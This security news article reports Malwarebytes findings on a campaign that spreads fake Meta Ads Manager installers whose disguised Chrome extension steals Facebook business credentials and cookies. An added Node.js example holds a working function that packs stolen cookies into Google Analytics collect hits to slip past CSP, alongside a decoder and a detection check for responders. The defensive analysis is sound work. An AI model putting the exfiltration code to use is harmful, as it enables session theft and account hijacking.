So far the campaign has affected roughly 800 individuals and businesses worldwide, 310 of them in the United States, and has compromised about $180,000 in advertising budget.
Facebook is a major advertising platform, and businesses worldwide rely on it to reach customers and grow revenue. That reach cuts both ways: cybercriminals use the same platform to spread malware and, in some cases, ransomware.
A recent warning from Malwarebytes senior threat researcher Jérôme Segura highlights why businesses need to stay alert. He cautions against malicious "Meta Ads Manager" downloaders and Chrome extensions, particularly when an offer seems too good to be true and requires following an unfamiliar URL. The primary targets are business account holders who are already spending ad dollars on Meta platforms.
Vietnamese Hackers Targeting Businesses’ Advertising Accounts
According to Malwarebytes' latest blog post, a newly identified cybercrime gang operating out of Vietnam has been running targeted attacks on Facebook business users with the aim of stealing their advertising accounts. Victims are not confined to one region; the attacks have been reported worldwide.
In his analysis, Jérôme Segura reported a noticeable surge in recent weeks of sponsored posts and accounts impersonating Meta/Facebook Ads Manager. Investigators found that the criminals are distributing counterfeit software, falsely promoted as a more effective tool for optimizing ads on Facebook. Businesses and advertisers need to be aware of this threat to safeguard their accounts and budgets.
The gang's method of choice is a malicious Chrome extension that steals Facebook business account credentials. Notably, Jérôme Segura was able to uncover the campaign thanks to a mistake made by the threat actors themselves.
The attackers uploaded the wrong file to their download location: instead of the payload, the link served a file containing data stolen from earlier victims. That error gave Malwarebytes researchers valuable insight into the operation and aided their investigation and analysis.
What Happens When Meta Business Accounts Get Infected with Malware?
Once the malicious extension is installed and the victim's credentials and session cookies have been harvested, the attackers can log in to the business account and spend its ad budget as they see fit. The campaign came to light in early June, when the threat actors lured businesses with fake Facebook Ads Manager installers, linked from sponsored posts, that promised to boost ad revenue.
To make the scheme more convincing, the attackers used fraudulent accounts with thousands of followers. Posts from these accounts spread quickly, deceiving more victims and widening the impact of the attack.
Victims are redirected to phishing pages that copy Meta's official logo and branding. Running the downloaded installer unpacks the components of an MSI package into the directory C:\Program Files (x86)\Ads Manager\Ads Manager. A batch script then launches a new browser window with a custom extension loaded.
In that window, the unsuspecting victim is prompted to enter their Facebook credentials on a deceptive login page. This fraudulent login page is how the criminals harvest credentials and gain unauthorized access to the victim's Facebook business account.
The custom extension masquerades as an unpacked Google Translate extension, which makes it look innocuous. Reverse engineering shows that its code has nothing to do with translation: its sole purpose is to collect Facebook login credentials and cookies from the victim's browser.
To exfiltrate the stolen data, the criminals route it through Google Analytics in order to get around Content Security Policy (CSP) restrictions. CSP blocks requests to hosts a page has not allowlisted, but Google Analytics is allowlisted on a great many sites, so a beacon to its collection endpoint is permitted where a request to an attacker-controlled domain would be blocked. Traffic to such a ubiquitous service also blends in with legitimate requests, which makes it unlikely to trip alarms. In effect, the attackers use Google Analytics as a conduit to carry the stolen data out of the victim's browser to infrastructure they control.
This method lets the gang keep operating discreetly while compromising the security and privacy of Facebook business account users.
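The following Node.js example is added here and is not code from the Malwarebytes report. With a constructed CSP header (not Facebook's real policy) it shows why a request to www.google-analytics.com passes a policy that allowlists that host while a request to an attacker domain does not, how stolen cookies could be packed into ordinary Measurement Protocol `collect` hits (the tracking ID, event names and cookie values are made up; the campaign's exact parameters are not reproduced in the article), how an incident responder can reassemble such hits from a proxy log, and a check that flags them.

```javascript
// Added example (not from the Malwarebytes report). Runs under Node.js; the
// CSP header, tracking ID and cookie values below are constructed samples.

// ---- 1. Minimal CSP source-list evaluator ---------------------------------
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function defaultPort(protocol) {
  return protocol === "https:" ? "443" : "80";
}

// Does one CSP source expression (e.g. 'self', https://*.example.com, data:)
// permit a request to `url` from a page at `pageOrigin`?
function sourceAllows(source, url, pageOrigin) {
  const u = new URL(url);
  if (source === "'self'") return u.origin === pageOrigin;
  if (source.startsWith("'")) return false;            // 'none', 'unsafe-inline', nonces, hashes
  if (source === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return u.protocol === source.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\*|\d+))?(\/[^?#]*)?$/i.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host, port, pathPrefix] = m;
  if (scheme && u.protocol !== scheme.toLowerCase() + ":") return false;
  const hostOk = wildcard ? u.hostname.endsWith("." + host.toLowerCase())
                          : u.hostname === host.toLowerCase();
  if (!hostOk) return false;
  if (port && port !== "*" && (u.port || defaultPort(u.protocol)) !== port) return false;
  if (pathPrefix && !u.pathname.startsWith(pathPrefix)) return false; // simplified path matching
  return true;
}

// Would fetch/XHR/sendBeacon to `url` be allowed? connect-src governs it,
// falling back to default-src; with neither present CSP imposes no limit.
function connectAllowed(header, url, pageOrigin) {
  const policy = parseCsp(header);
  const sources = policy["connect-src"] || policy["default-src"];
  if (!sources) return true;
  return sources.some(s => sourceAllows(s, url, pageOrigin));
}

// ---- 2. Packing stolen cookies into Measurement Protocol hits -------------
// Whoever controls the tracking ID (tid) sees whatever text is placed in the
// event fields, so the allowlisted analytics host becomes a drop box.
// Long payloads are split across hits; chunkSize keeps each label short.
function buildExfilHits(trackingId, clientId, payload, chunkSize = 500) {
  const encoded = Buffer.from(JSON.stringify(payload), "utf8").toString("base64");
  const chunks = [];
  for (let i = 0; i < encoded.length; i += chunkSize) chunks.push(encoded.slice(i, i + chunkSize));
  return chunks.map((chunk, i) => {
    const params = new URLSearchParams({
      v: "1", tid: trackingId, cid: clientId, t: "event",
      ec: "session", ea: "cookies", el: `${i}/${chunks.length}:${chunk}`,
    });
    return "https://www.google-analytics.com/collect?" + params.toString();
  });
}

// ---- 3. Responder side: reassemble and flag ------------------------------
// Rebuild the stolen payload from the hits recorded in a proxy or EDR log.
function decodeExfilHits(urls) {
  const parts = [];
  for (const raw of urls) {
    const m = /^(\d+)\/(\d+):(.*)$/.exec(new URL(raw).searchParams.get("el") || "");
    if (m) parts.push({ index: Number(m[1]), chunk: m[3] });
  }
  parts.sort((a, b) => a.index - b.index);
  return JSON.parse(Buffer.from(parts.map(p => p.chunk).join(""), "base64").toString("utf8"));
}

// Flag collect hits that use a tracking ID the organisation does not own or
// carry long base64-looking blobs in free-text event fields.
function flagSuspiciousAnalyticsHits(urls, knownTrackingIds) {
  const flagged = [];
  for (const raw of urls) {
    const u = new URL(raw);
    if (!/(^|\.)google-analytics\.com$/.test(u.hostname) || !u.pathname.endsWith("/collect")) continue;
    const reasons = [];
    const tid = u.searchParams.get("tid");
    if (!knownTrackingIds.has(tid)) reasons.push(`unknown tid ${tid}`);
    for (const field of ["ec", "ea", "el", "dp", "dt"]) {
      const value = u.searchParams.get(field) || "";
      if (value.length > 200) reasons.push(`${field} is ${value.length} chars long`);
      if (/[A-Za-z0-9+/]{40,}={0,2}/.test(value)) reasons.push(`${field} looks base64-encoded`);
    }
    if (reasons.length) flagged.push({ url: raw, reasons });
  }
  return flagged;
}

// Constructed samples: not Facebook's real policy, not real cookie values.
const SAMPLE_CSP = "default-src 'self'; connect-src 'self' https://www.google-analytics.com https://*.facebook.com; img-src 'self' data: https://www.google-analytics.com";
const STOLEN = { c_user: "100012345678901", xs: "45:AbCdEfGhIjKlMnOp:2:1688000000", datr: "Zm9vYmFyYmF6cXV4cXV1eA" };
```

The point of the evaluator is that CSP decides on the destination host, not on what the request carries: once `https://www.google-analytics.com` is in `connect-src` (or `img-src`, for a tracking pixel), any hit to `/collect` is allowed regardless of who owns the tracking ID. The detection side therefore keys on the tracking ID being one the organisation actually uses, and on free-text fields carrying encoded blobs rather than page paths and event names.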
For context, Facebook Ads Manager is the tool used to run online ads across Meta's platforms, including Instagram. Researchers recently identified approximately 20 malicious "ads manager" installer archives, all used to deliver Chrome extensions intended to hijack Facebook business accounts.
During the investigation, researchers came across a newly registered phishing site and noticed an unexpected mistake by the criminals: the download on offer did not contain the payload at all, but a file of stolen data.
Once they noticed the error, the criminals promptly removed the file from their Google Drive account and updated the download link on the phishing site to a new file hosted on MediaFire, presumably to cover their tracks and keep the operation running.
Further analysis showed that the column headings in the stolen data were in Vietnamese and related to ad budgets and currencies. Since these are labels the attackers used for their own bookkeeping rather than victim data, they point to the operators' language rather than the victims', and are the main basis for attributing the gang to Vietnam.
As of now, the campaign has claimed around 800 individuals and businesses, which underlines the severity of the threat and the need for vigilance against phishing and malware distribution schemes of this kind. Worse, the threat actors compromised over $180,000 in ad budget, with 310 of the victims located in the United States.
Meta has previously reported that threat actors such as DuckTail have been targeting Facebook advertising accounts for an extended period. Jérôme Segura acknowledges that this actor cannot be directly attributed to DuckTail, but points to clear similarities in motive and the shared focus on hijacking Facebook business accounts, which leaves open the possibility of a connection.
Facebook has been notified of the campaign and has taken action. Users of Facebook Business Manager should immediately review the users and partners with access to their account and revoke any they do not recognize, and run a thorough scan of their computers to find and remove the installed malware and extension. Because the extension steals session cookies as well as passwords, changing the password is not enough on its own: the compromised account should also be logged out of all active sessions so that stolen cookies stop working. These steps will help protect accounts and data from further abuse.
- Mandrake Android malware stealing Facebook data since 2016
- Facebook ads dropped malware posing as a Clubhouse PC app
- CopperStealer malware steals Facebook and Google passwords
- Facebook removes 100s of accounts for iOS and Android malware